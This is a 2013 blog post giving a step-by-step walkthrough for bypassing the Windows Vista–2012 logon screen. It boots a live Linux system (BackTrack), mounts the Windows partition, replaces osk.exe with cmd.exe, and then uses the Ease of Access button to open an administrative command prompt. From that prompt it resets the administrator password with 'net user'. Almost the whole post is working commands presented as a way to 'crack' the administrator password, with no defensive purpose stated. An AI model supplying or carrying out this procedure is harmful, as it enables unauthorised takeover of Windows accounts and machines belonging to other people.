Wednesday 31 July 2013

Crack Adminsitrator password in Windows, Bypass the logon screen in Windows Vista/7/8 Windows server 2008/2008 r2/2012

Activating Command Prompt at Windows Logon Screen to change administrator Password without knowing the old password.

By booting the System using any live operating system like Ubuntu, we can change or modify the files associated with 'Onscreen Keyboard', 'Magnifier', Narrator' and Sticky Keys, when any body executes any of these programs, Command prompt will be executed with administrative privileges and hence allows anybody to perform administrative task like changing policies and user accounts details,etc.
User can execute the at windows logon screen using 'Ease of access' at bottom left corner. No password required for this.

Steps to follow:
  1. Boot the system with live OS, here BACTRACK 5r3 and open terminal and execute given commands.
  2. fdisk -l     //list the availaible partitions on system, note the partition that may contain Windows
  3. mount /dev/sda1 /mnt    //let say /dev/sda1 is the partition of windows, is mount to /mnt 
  4. cd /mnt      //to list the contents of the partion it show contains the folder like Windows, Users, Program Files.etc, If not mount other partition.
  5. cd Windows/System32      //Get inside the System32 folder which is contained in Windows folder
  6. cp osk.exe oskbak.exe     //make the backup of original file for restoring once password is changed
  7. cp cmd.exe osk.exe      //now osk.exe and cmd.exe ar same thing
  8. sync      //finalize the changes onto disk
  9. poweroff       //shutdown Live os
Now start windows normally, and at windows logon screen, where it asks for password, click on the Ease of Access icon on left corner and Activate OnScreen Keyboard.
Command Prompt will be activated, now you can change password of administrator account using  command
 net user administrator *    //it allows you to change password for administrator user.

Now restore the original file, by repeating the step 1 to step 5
     6. cp oskbak.exe osk.exe
     7. sync




No comments:

Post a Comment

Feel Free to Share issues with me....